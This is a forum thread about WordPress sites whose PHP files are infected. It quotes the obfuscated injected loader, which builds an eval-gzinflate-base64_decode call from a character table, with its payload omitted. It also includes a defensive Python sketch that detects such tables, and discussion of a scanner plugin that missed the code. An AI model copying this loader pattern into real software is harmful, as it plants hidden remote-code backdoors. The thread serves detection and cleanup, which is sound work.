I am unlucky because all the php files in my public_html are infected with the following code:

<?php
$md5 = "59f063d5d1a6b701de0b7628b708f1dd";
$a5 = array("v",";","t",'n',"e",'6',"(",'b','i','c','$','_',"r",'d','l','g',"f",")","o","4","a",'z',"s");
$b50 = create_function('$'.'v',$a5[4].$a5[0].$a5[20].$a5[14].$a5[6].$a5[15].$a5[21].$a5[8].$a5[3].$a5[16].$a5[14].$a5[20].$a5[2].$a5[4].$a5[6].$a5[7].$a5[20].$a5[22].$a5[4].$a5[5].$a5[19].$a5[11].$a5[13].$a5[4].$a5[9].$a5[18].$a5[13].$a5[4].$a5[6].$a5[10].$a5[0].$a5[17].$a5[17].$a5[17].$a5[1]);
$b50('[base64-encoded payload omitted]');
?>

Now I found some articles about this code.
http://stackoverflow.com/questions/7307970/cleanup-php-files-from-virus
http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html

EDIT: If you have malware on your web hosting and want to remove it, please contact me by writing a mail here. Thanks
How did you discover that you had the virus? Was your site acting up? I'm curious, so I know what to look for, how to tell if I have it.
I haven't had to remove any malware yet, but this plugin will look for it and it claims to remove the bad code from files where it finds it. Anti-Malware
So I was making a new design, a new theme which is mine, and I saw the code in my theme which is made by me, and then I got it. The code which I gave sends information from my server to the hackers and enough. I liked the article on http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html On all WordPress sites, when they are new, this is the first plugin which I install, but nothing. It would be nice to delete the code with one command on ssh. Anyway, the best solution is the article which I mentioned above on php-beginners.com
Robin, out of curiosity I reused the plugin which you mentioned; please look at the attached screenshot. So the directory is full of that code, but this plugin finds only 0 results. If you open this article you will see the list of malware iframes, JavaScripts and the same code as mine, but I think that this plugin doesn't have this virus in its database
Thx for the info, AlbCoder! Re the plugin not finding the malicious code, is it because the hackers are able to make the code "invisible" to the plugin?
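An added example, not part of the thread and not the plugin's code: in the code from the first post the words eval, gzinflate and base64_decode never appear literally, because they are assembled from a character table, so a plain substring search for them comes back empty. This Python sketch resolves such tables before searching; SAMPLE is constructed with the same structure and a placeholder payload, and the function names are hypothetical.

```python
import re

# Constructed sample: same structure as the code in the first post,
# with the encoded payload replaced by a harmless placeholder.
SAMPLE = r"""<?php $a5 = array("v",";","t",'n',"e",'6',"(",'b','i','c','$','_',"r",'d','l','g',"f",")","o","4","a",'z',"s"); $b50 = create_function('$'.'v',$a5[4].$a5[0].$a5[20].$a5[14].$a5[6].$a5[15].$a5[21].$a5[8].$a5[3].$a5[16].$a5[14].$a5[20].$a5[2].$a5[4].$a5[6].$a5[7].$a5[20].$a5[22].$a5[4].$a5[5].$a5[19].$a5[11].$a5[13].$a5[4].$a5[9].$a5[18].$a5[13].$a5[4].$a5[6].$a5[10].$a5[0].$a5[17].$a5[17].$a5[17].$a5[1]); $b50('PLACEHOLDER'); ?>"""

WORDS = ("eval", "gzinflate", "base64_decode")  # names the post's code hides
LIT = r'''(?:"[^"]*"|'[^']*')'''                # one quoted PHP string literal
TABLE_RE = re.compile(r'\$(\w+)\s*=\s*array\s*\(\s*((?:' + LIT + r'\s*,?\s*)+)\)')
LITERAL_RE = re.compile('"([^"]*)"|\'([^\']*)\'')


def resolve_tables(src):
    """Return {name: [strings]} for each $name = array('x', "y", ...).

    Assumption: elements are plain literals; PHP escapes are not interpreted.
    """
    return {name: [a or b for a, b in LITERAL_RE.findall(body)]
            for name, body in TABLE_RE.findall(src)}


def hidden_strings(src):
    """Rebuild every $name[i].$name[j]... chain from the tables found in src."""
    out = []
    for name, chars in resolve_tables(src).items():
        chain = re.compile(r'(?:\$%s\[\d+\]\s*\.\s*)+\$%s\[\d+\]' % (name, name))
        for m in chain.finditer(src):
            idx = [int(i) for i in re.findall(r'\[(\d+)\]', m.group(0))]
            if all(i < len(chars) for i in idx):  # skip out-of-range indices
                out.append("".join(chars[i] for i in idx))
    return out


def scan(src):
    """Return (literal_hits, hidden_hits): what a substring search sees
    versus what the resolved character-table chains spell out."""
    literal = [w for w in WORDS if w in src]
    hidden = [s for s in hidden_strings(src) if any(w in s for w in WORDS)]
    return literal, hidden


if __name__ == "__main__":
    print(scan(SAMPLE))
```
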
Try posting your results here: http://wordpress.org/support/plugin/gotmls Eli (the plugin author) really cares and responds quickly.